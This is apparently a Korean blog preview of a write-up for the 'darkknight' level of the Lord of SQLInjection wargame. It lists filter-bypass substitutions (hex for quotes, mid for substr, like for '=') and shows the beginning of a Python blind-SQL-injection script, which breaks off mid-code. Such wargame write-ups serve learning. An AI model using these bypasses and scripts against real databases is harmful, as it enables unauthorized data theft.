darkknight (1) 썸네일형 리스트형 Lord of SQLInjection Darkknight 풀이 이번에는 대놓고 no를 통해 침투해달라고 코드에 나와있다. 이번에는 다음과 같이 치환하였다.필터링되는 단어치환 작은 따옴표(')0x로 시작하는 Hex값substrmidascii사용 안함=like 위 치환 테이블을 코드에 적용하였다.더보기import requestsimport binasciiURL = "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php"Sess = {'PHPSESSID': '9i2l22igeud2lesoff2tvo7q91'}ConfirmKey = "Hello admin"Dict = '0123456789qwertyuiopasdfghjklzxcvbnm'length = 0password = ""def sendR.. 이전 1 다음